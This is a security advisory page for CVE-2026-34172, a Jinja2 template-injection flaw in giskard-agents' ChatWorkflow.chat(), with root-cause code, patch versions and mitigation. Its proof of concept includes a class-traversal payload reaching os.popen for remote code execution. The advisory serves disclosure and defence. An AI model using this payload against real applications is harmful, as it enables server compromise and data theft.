Cloud Vulnerability DB
A community-led vulnerabilities database
Wiz Agents & Workflows are here
Vulnerability DatabaseCVE-2026-34172
CVE-2026-34172:
Python vulnerability analysis and mitigation
Summary
ChatWorkflow.chat(message) passes its string argument directly as a Jinja2 template source to a non-sandboxed Environment. A developer who passes user input to this method enables full remote code execution via Jinja2 class traversal.
The method name chat and parameter name message naturally invite passing user input directly, but the string is silently parsed as a Jinja2 template, not treated as plain text.
Root Cause
libs/giskard-agents/src/giskard/agents/workflow.py line ~261:
def chat(self, message: str | Message | MessageTemplate, role: Role = "user") -> Self:
if isinstance(message, str):
message = MessageTemplate(role=role, content_template=message)The string becomes content_template, which is parsed by from_string():
libs/giskard-agents/src/giskard/agents/templates/message.py lines 14-15:
def render(self, **kwargs: Any) -> Message:
template = _inline_env.from_string(self.content_template)
rendered_content = template.render(**kwargs)The Jinja2 Environment is not sandboxed:
libs/giskard-agents/src/giskard/agents/templates/environment.py line 37:
_inline_env = Environment(
autoescape=False,
# Not SandboxedEnvironment
)Proof of Concept
from jinja2 import Environment
env = Environment() # Same as giskard's _inline_env
# Class traversal reaches os.popen
t = env.from_string("{{ ''.__class__.__mro__[1].__subclasses__() | length }}")
print(t.render()) # 342 accessible subclasses
# Full RCE payload (subclass index varies by Python version)
# {{ ''.__class__.__mro__[1].__subclasses__()[INDEX].__init__.__globals__['os'].popen('id').read() }}A developer building a chatbot:
workflow = ChatWorkflow(generator=my_llm)
workflow = workflow.chat(user_input) # user_input parsed as Jinja2 template
result = await workflow.run() # RCE if user_input contains {{ payload }}Note: using .with_inputs(var=user_data) is safe because variable values are not parsed as templates. The issue is only when user strings are passed directly to chat().
Impact
Remote code execution on the server hosting any application built with giskard-agents that passes user input to ChatWorkflow.chat(). Attacker can execute system commands, read files, access environment variables.
Affects giskard-agents <=0.3.3 and 1.0.x alpha. Patched in giskard-agents 0.3.4 (stable) and 1.0.2b1 (pre-release).
Mitigation
Update to 0.3.4 (or 1.0.2b1 for the pre-release branch) which includes the fix.
The fix replaces the unsandboxed Jinja2 Environment with SandboxedEnvironment, which blocks attribute access to dunder methods and prevents class traversal chains. SandboxedEnvironment blocks access to attributes starting with _, preventing the __class__.__mro__ traversal chain.
Source: NVD
Related Python vulnerabilities:
Free Vulnerability Assessment
Benchmark your Cloud Security Posture
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Additional Wiz resources
Get a personalized demo
Ready to see Wiz in action?
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management